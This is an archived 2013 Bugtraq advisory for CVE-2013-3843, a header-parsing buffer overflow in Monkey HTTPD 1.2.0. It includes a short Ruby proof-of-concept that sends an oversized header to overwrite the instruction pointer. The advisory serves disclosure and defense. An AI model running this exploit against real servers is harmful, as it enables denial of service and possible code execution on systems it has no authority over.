lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201306041619.r54GJnU3024014@sf01web3.securityfocus.com>
Date: Tue, 4 Jun 2013 16:19:49 GMT
From: dougtko@...il.com
To: bugtraq@...urityfocus.com
Subject: CVE-2013-3843  Monkey  HTTPD  1.2.0 - Buffer Overflow DoS
 Vulnerability With Possible Arbitrary Code Execution

1. Title

   CVE-2013-3843  Monkey  HTTPD  1.2.0 - Buffer Overflow DoS
   Vulnerability With Possible Arbitrary Code Execution

2. Introduction

   Monkey is a  lightweight  and  powerful  web  server  for
   GNU/Linux.

   It  has been designed to be very scalable with low memory
   and CPU consumption, the perfect  solution  for  embedded
   devices. Made for ARM, x86 and x64.


3. Abstract

   A  specially  crafted  request  sent  to the Monkey HTTPD
   server triggers a buffer overflow which can  be  used  to
   control the flow of execution.

4. Report Timeline

   2013-05-29
      Discovered vulnerability via fuzzing
   2013-05-30
      Vendor Notification

5. Status

      Published

6. Affected Products

      Monkey HTTPD <= 1.2.0

7. Exploitation Technique

      Remote

8. Details

      Improper  bounds checking while parsing headers allows
      for an attacker to craft a request that will trigger a
      buffer  overflow during a call to memcpy() on line 268
      in the file, mk_request.c.

9. Proof of Concept

      The vulnerability can be exploited by remote  attacker
      without  any  special privileges.  Under Ubuntu 13.04,
      an offset of 2511 lines  up  the  instruction  pointer
      with, 0x42424242.


     #!/usr/bin/env ruby

     require "socket"

     host = "localhost"
     port = 2001

     s = TCPSocket.open(host, port)

     buf = "GET / HTTP/1.1\r\n"
     buf << "Host: " + "\r\n"
     buf << "localhost\r\n"
     buf << "Bad: "
     buf << "A" * 2511
     buf << "B" * 4

      s.puts(buf)


10. Solution

   There is currently no solution.

11. Risk

   Risk should be considered high since it can be shown that
   the flow of execution can be controlled by an attacker.

12. References

   http://bugs.monkey-project.com/ticket/182

13. Credits

   Doug Prostko <dougtko[at]gmail[dot]com>
      Vulnerability discovery

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ